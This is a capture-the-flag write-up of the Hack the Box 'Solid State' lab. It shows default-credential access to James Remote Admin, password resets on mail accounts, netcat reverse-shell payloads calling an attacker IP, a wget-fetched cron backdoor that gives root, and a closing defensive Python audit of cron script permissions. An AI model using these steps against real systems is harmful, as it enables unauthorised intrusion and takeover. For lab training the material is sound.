Hello Friends!! Today we are going to solve the CTF challenge “Solid State”. It is a lab featured on Hack the Box, which has an amazing collection of online labs on which you can practice your penetration testing skills, ranging from beginner to expert. Solid State is a retired lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable lab.
Let’s begin!
As these labs are only available online, they have a static IP. The Solid State lab has IP 10.10.10.51.
Now, as always, let’s begin our hacking with port enumeration.
Command: nmap 10.10.10.51 -sV -p- --open
As you can see in the screenshot above, a couple of ports are open, among them 80, 110, 119 and 4555.
Port 80 is open, so let’s open the IP in our browser to see whether a website is hosted on it.
After opening the IP in the browser we can see that it is a basic website; nothing exciting.
Now back to 4555: it runs the service James Remote Admin 2.3.2. After searching a while on the internet, I found that the default credentials for logging in to the Remote Admin are root:root.
It is a golden rule to try the default credentials, so let’s try to get into the Remote Admin with them. For this we will use netcat, as shown in the image below.
nc 10.10.10.51 4555
Great, we have logged in to the Remote Admin service. After that we ran the HELP command to get the list of available commands.
Here the listusers command draws our attention; let’s see what it does. Great, we have the list of mail users on the server.
Back in the HELP output we had the setpassword command. Let’s use it to change the passwords of all the users so that we can enumerate further.
Command: setpassword james 1234
Ok, so now we have the users for the POP3 service and their passwords. Now let’s dig into that; for that we will use telnet.
telnet 10.10.10.51 110
User: john
Pass: 1234
LIST
After logging in with the credentials of the user john, we ran the LIST command, which lists all the messages in john’s account. Let’s see if we find something here.
Nope, hard luck!! We didn’t get much in this one, but let’s try another user.
Again open a new telnet session, but this time enter the credentials of the user mindy.
telnet 10.10.10.51 110
User: mindy
Pass: 1234
LIST
Using LIST we got the mails in mindy’s account. Let’s open them to see if we can get some hint in the mail to move forward.
After opening the mail we found a message sent from the admin account by James to mindy, sharing her SSH login credentials. It is a jackpot!!
Username: mindy
Pass: P@55W0rd12@
Let’s go and get an SSH shell on the machine, using mindy’s credentials to log in.
ssh mindy@10.10.10.51
Cool!! We got access to the victim’s PTS shell.
Since we have enumerated the target and found Apache James Server 2.3.2 running, and after browsing the internet we stumbled across the Exploit DB module shown below, now copy the whole python code from there.
Paste the copied python code into a text file, make the following change inside the payload as highlighted in the image below, and then save it; we have it as exploit.py on the desktop.
nc -e /bin/sh 10.10.14.3 8000
Here 10.10.14.3 is the attacker’s IP and 8000 is the port listening for the reverse connection from the target’s network.
Now run the saved python file, as I did with the command below:
./exploit.py 10.10.10.51
Ok, done! The exploit will work only when someone logs in. So let’s log in to the SSH shell again using the user mindy’s credentials; as soon as we log in the exploit begins to work, as shown below.
Let’s open a netcat listener to catch the shell that will be generated once our exploit has completely executed. Now we use python’s pty module to get a proper terminal; to do so type:
python -c "import pty; pty.spawn('/bin/bash')"
Lovely!! So again we got access to the victim’s system shell, but this time we have a TTY shell on the system. Now let’s check the directory.
ls
Here we can see user.txt, which indicates we have almost completed our 1st challenge.
I used the cat command to read the user.txt file, and with this we had completed our first challenge.
Now let’s move towards the 2nd challenge, root.txt. Currently we are in mindy’s directory. For the root.txt file we need to get to root, but I had no idea of the next step. Then I recalled that mindy had received a mail from the admin account sent by James; there is a chance of getting a hint from James, so I chose to grep the running processes for james by executing the following command.
ps aux | grep james
Here aux works as described below:
a = display processes for all users
u = show the process’s user/owner
x = show processes not attached to a terminal
Great!! It shows a root process running a file in /opt.
Then I moved into the /opt directory and ran ls -al to explore all the files and folders inside it.
cd /opt
ls -al
It showed two files, among which I’m interested in the tmp.py file.
When I used the cat command to read this file I found python code inside it. This code was useless to me as it was; to make it useful I needed to edit the file and add my own code to it, so let’s first copy this code into a text file.
As you can see in the image below, I edited in a netcat backdoor with the following command, saved the file as tmp.py, and then transferred the file to the victim’s system.
/bin/nc -e /bin/bash 10.10.14.3 8081
I tried to download our malicious tmp.py directly into /opt, but it failed due to limited access, so first I downloaded the file into the /tmp directory using wget.
wget http://10.10.14.4/tmp.py
When it had downloaded successfully I copied it over into the /opt directory.
cp tmp.py /opt
cd /opt
ls
Great!! We can see the tmp.py file inside /opt; let’s confirm the file contents using cat.
cat tmp.py
Yeppii!!! We have successfully uploaded our one-liner netcat backdoor onto the victim’s system. Now let’s start netcat in a new terminal to listen for the reverse connection.
nc -lvp 8081
Then I ran the crontab -l command for the reverse connection and moved back to the netcat terminal.
At netcat you will get the reverse connection about 3 minutes after you run the crontab command. We have the root shell, and just by using the ls command we located root.txt.
Great!! We got our 2nd flag successfully. Enjoy hacking!!
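The root step above only works because a script that root’s cron executes (/opt/tmp.py) could be overwritten by an unprivileged user. As an added example, not from the original writeup, here is a small Python audit that flags that misconfiguration for any list of cron-run scripts; the sample files and temp directory it creates are constructed so it runs offline, and on a real host you would feed it the paths from `crontab -l`.

```python
import os
import stat
import tempfile


def audit_cron_script(path, expected_uid=0):
    """Return findings for one script that root's cron executes."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return ["missing: %s" % path]
    findings = []
    if st.st_uid != expected_uid:
        findings.append("owner uid %d is not %d" % (st.st_uid, expected_uid))
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    # A world-writable parent without the sticky bit lets anyone replace
    # the file with cp/mv even if the file itself is read-only.
    parent = os.stat(os.path.dirname(path) or ".")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory is world-writable")
    return findings


def build_demo():
    """Create two constructed sample scripts in a temp dir: safe and weak."""
    root = tempfile.mkdtemp()
    os.chmod(root, 0o755)
    safe = os.path.join(root, "safe.py")
    weak = os.path.join(root, "tmp.py")  # name mirrors the writeup's script
    for p in (safe, weak):
        with open(p, "w") as fh:
            fh.write("#!/usr/bin/env python3\nprint('cron job')\n")
    os.chmod(safe, 0o755)  # owner-writable only: fine for a root cron job
    os.chmod(weak, 0o777)  # anyone can overwrite it: the privesc vector
    return safe, weak


def demo_findings():
    """Audit the constructed samples, treating their creator as the owner."""
    safe, weak = build_demo()
    uid = os.stat(safe).st_uid
    return {"safe.py": audit_cron_script(safe, uid), "tmp.py": audit_cron_script(weak, uid)}


if __name__ == "__main__":
    for name, issues in demo_findings().items():
        print(name, "OK" if not issues else "; ".join(issues))
```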